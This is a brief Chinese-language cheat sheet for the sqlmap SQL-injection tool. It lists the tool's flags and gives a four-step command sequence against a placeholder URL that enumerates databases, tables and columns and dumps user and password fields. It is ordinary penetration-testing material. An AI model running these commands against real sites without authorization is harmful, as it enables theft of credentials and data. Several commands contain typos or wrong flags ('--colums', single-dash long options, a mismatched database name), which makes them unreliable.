sqlmap基础命令
sqlmap 是一个开源的渗透测试工具,用来自动化检测,利用SQL注入漏洞,获取数据库连接服务器权限。
下载:https://github.com/sqlmapproject/sqlmap/zipball/master
swlmap支持MySQL,Oracle,等数据库的各种检测。
注入模式:布尔盲注,根据返回页面条件注入。
基础命令
-h ,help 显示基本帮助信息
-hh 显示高级帮助信息
-level=LEVEL 执行测试的等级(1-5,默认1)
-risk=RISK 执行测试的风险(0-3,默认1)
-v VERBOSE 显示信息的详细级别:0-6(默认为1)
-u URL, 目标URL
-m BULKFILE 将目标地址保存在文件中,按照顺序进行批量检测
-r REQUESTFILF 从文件中加载 HTTP请求,sqlmap可以从文件中获取HTTP请求
-b 获取数据库版本信息
-D 指定数据库名
-T 指定表名
-C 指定字段
-is-dba 当前用户权限(是否为root权限)
-current-db 网站当前数据库
--string = STRING 在基于布尔的注入时,有的时候返回的页面一次一个样,需要我们自己判断出标志着返回正确页面的标志,会根据页面的返回内容这个标志(字符串)判断真假,可以使用这个参数来制定看见什么字符串就是真。
--dbs 目标服务器中有什么数据库,常用,直接用--dbs
--tables目标数据库有什么表,常用,直接用--tables
--columns目标表中有什么列,常用,直接用--columns
--dump查询指定范围的全部数据。
SQLMAP 用于mysql注入
1>查询数据库 sqlmap.py -u http://www.xxx.com/link.php?id=123 --dbs
2>通过1>的数据库查找表(数据库test) sqlmap.py -u http://www.xxx.com/link.php?id=123 -D test --tables
3>通过2>的表得到列(表名table_id) sqlmap.py -u http://www.xxx.com/link.php?id=123 -D test -T table_id --colums
4>通过3>获取字段(user,password字段) sqlmap.py -u http://www.xxx.com/link.php?id=123 -D user -C user,password --dump